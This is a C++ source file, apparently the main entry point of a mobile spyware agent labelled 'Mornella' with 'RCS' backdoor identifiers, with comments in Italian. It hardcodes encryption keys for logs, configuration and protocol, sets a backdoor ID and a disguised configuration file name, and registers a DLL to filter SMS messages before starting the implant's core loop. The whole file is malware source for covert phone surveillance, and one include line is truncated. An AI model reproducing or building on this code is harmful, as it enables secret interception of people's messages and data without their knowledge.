// Mornella Static #include "Core.h" #include int WINAPI main(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { Core *core; // RCS_0000001018 rcs-castore BYTE LogKey[] = { 0xea, 0xa9, 0x58, 0x00, 0xab, 0x28, 0xeb, 0x18, 0x65, 0xd9, 0x00, 0x9e, 0xb0, 0xa3, 0x5c, 0x5c }; BYTE ConfKey[] = { 0x4a, 0xe7, 0x96, 0x80, 0xbf, 0x7d, 0xf4, 0x9d, 0x9d, 0x1e, 0x68, 0x13, 0x3d, 0xd7, 0xba, 0x4b }; BYTE ProtoKey[] = { 0x57, 0x2e, 0xbc, 0x94, 0x39, 0x12, 0x81, 0xcc, 0xf5, 0x3a, 0x85, 0x13, 0x30, 0xbb, 0x0d, 0x99 }; g_hInstance = hInstance; // Configurazione artificiale di alcune variabili ZeroMemory(g_AesKey, 32); ZeroMemory(g_Challenge, 32); ZeroMemory(g_ConfKey, 32); ZeroMemory(g_BackdoorID, 16); ZeroMemory(g_ConfName, 32 * sizeof(WCHAR)); CopyMemory(g_AesKey, LogKey, 16); CopyMemory(g_Challenge, ProtoKey, 16); CopyMemory(g_ConfKey, ConfKey, 16); CopyMemory(g_BackdoorID, "RCS_0000000012", strlen("RCS_0000000xxx")); CopyMemory(g_ConfName, L"cptm511.dql", WideLen(L"cptm511.dql")); // Fine configurazione artificiale // Unregistriamo la DLL HMODULE hSmsFilter; // Installiamo la DLL del filtro SMS hSmsFilter = NULL; typedef HRESULT (*pRegister)(); pRegister RegisterFunction; // Unregistriamo la DLL per il filtering degli SMS hSmsFilter = LoadLibrary(SMS_DLL); if (hSmsFilter != NULL) { RegisterFunction = (pRegister)GetProcAddress(hSmsFilter, L"DllRegisterServer"); if (RegisterFunction != NULL) { RegisterFunction(); } FreeLibrary(hSmsFilter); } // core = new(std::nothrow) Core(); if (core == NULL) return 0; core->Run(); delete core; return 0; } .